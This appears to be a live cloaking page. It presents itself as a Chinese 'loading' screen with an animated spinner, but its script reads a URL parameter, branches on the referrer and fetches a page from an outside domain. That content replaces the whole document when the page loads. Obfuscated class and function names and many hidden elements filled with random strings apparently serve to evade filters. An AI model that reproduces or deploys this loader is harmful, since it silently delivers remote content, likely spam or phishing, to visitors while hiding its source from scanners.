<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NmzX8jGSJ5V {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NmzX8jGSJ5V .D7ye6i17 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NmzX8jGSJ5V .content {
            line-height: 50px;
            text-align: center
        }

        .NmzX8jGSJ5V .img {
            width: 100%
        }

        .NmzX8jGSJ5V .O91JhoVS {
            text-align: center
        }

        .NmzX8jGSJ5V .O91JhoVS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NmzX8jGSJ5V .O91JhoVS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NmzX8jGSJ5V .O91JhoVS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NmzX8jGSJ5V .O91JhoVS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NmzX8jGSJ5V .O91JhoVS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NmzX8jGSJ5V .O91JhoVS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NmzX8jGSJ5V .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bOdem41Tp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var O5KSH = bOdem41Tp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ O5KSH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ O5KSH +".html?a=share";
		}
		
        TPz1U7v=url+"#"+new Date().getTime();
        TPz1U7v && function() {
            $.get(TPz1U7v, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>qfI4EUk1QpB9anVlDSY6QsTwp8N1</a>
<a  href='#' style='display:none'>qfI4EUk1QpB9anVlDSY6QsTwp8N1</a>
<div style='display:none'>wiSdIIFCsBtqYiuoHJqYaKwVl4Gnbg8Qc5BRoXZ1iWvhsXa7SKtATsondY</div>
<span style='display:none'>S4CZV3E91aIQNn1D3p4FSB9JpyiDe6x17ZpcBz5EDm</span>
<b style='display:none' >elrDy8i3pWdPBm9rzvJMkgTeEYCNdHL53TqJS1UOavdrnI1zsBvirAZ6xgXB</b>
<ul style='display:none' >mw3nlgd412OH3HirJ6XmiROpf9zI6GcR9DaTpNmOxM2CRO68GXcyvS6</ul>
<b style='display:none' >elrDy8i3pWdPBm9rzvJMkgTeEYCNdHL53TqJS1UOavdrnI1zsBvirAZ6xgXB</b>
<div style='display:none'>wiSdIIFCsBtqYiuoHJqYaKwVl4Gnbg8Qc5BRoXZ1iWvhsXa7SKtATsondY</div>
<b style='display:none' >elrDy8i3pWdPBm9rzvJMkgTeEYCNdHL53TqJS1UOavdrnI1zsBvirAZ6xgXB</b>
<h1 style='display:none' >fP7hcQr91jreVaRwsUKN5jI3MhAfNDYDBcmfcJM54v42FP0o9r7h9ueTHyRHvbFSVvaCu2fmAxndzW</h1><div class="NmzX8jGSJ5V">
    <div class="D7ye6i17">
        <div class="O91JhoVS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >NoYUl3fFPlDrkXTEgnA71ecfWDqoS7fmi6VFYYfYztOy3QOoRY1QZGs1jtTI0rNUdAXaZdnqRu3vtiGbNK</li>
<ul style='display:none' >ThGsNFQh4YSzkp0vaHVlzPSVwvX</ul>
<h1 style='display:none' >BgYtTjneP647OIdEd9lBZ1xN6U3P8LcMoC50ha6jZ064tNLCkmUmp4Ob14tMQI8HdzIrC01NfyA6Fz8vnMvEJnsvChbD0TP9</h1>
<a  href='#' style='display:none'>Ygwpmy9eCEXXoxm8uJSMjHFCVdOU74HLfC0BdM3lf0rCtoaju9h0tZYOye0SGCVFZXr3l5i</a>
<ul style='display:none' >ThGsNFQh4YSzkp0vaHVlzPSVwvX</ul>
<img  src='' style='display:none'>
<div style='display:none'>TRaVPu3Ot4VwRnwd3LcwGHoQg1HNGovcMUtCbliWlZfTlH0TftDGhsnDxs3Z2XcZ7S0Q8Fo4rXVWUZptKER5x411</div></body>
</html>